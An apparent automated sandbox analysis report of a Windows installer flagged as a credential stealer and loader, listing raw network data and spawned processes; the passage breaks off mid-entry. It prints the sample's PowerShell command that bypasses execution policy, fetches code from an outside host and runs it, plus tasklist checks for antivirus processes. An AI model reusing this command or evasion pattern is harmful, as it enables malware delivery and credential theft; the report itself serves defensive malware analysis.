                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72
                                                                                                                                                Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUStr
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4
                                                                                                                                                Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04
                                                                                                                                                Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:12:12:58
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:75'269'806 bytes
                                                                                                                                                MD5 hash:B92EE6AFF573D5F6AEC1CFD748FE3CCB
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2174288204.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:12:13:19
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
                                                                                                                                                Imagebase:0x570000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:12:13:19
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:12:13:27
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:12:13:29
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:12:13:30
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:12:13:30
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
                                                                                                                                                Imagebase:0x270000
                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:12:14:00
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"timeout" 9
                                                                                                                                                Imagebase:0x7ff7fda30000
                                                                                                                                                File size:32'768 bytes
                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:12:14:00
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "avastui.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff6a5670000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "avgui.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:34
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:36
                                                                                                                                                Start time:12:14:17
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                Imagebase:0x400000
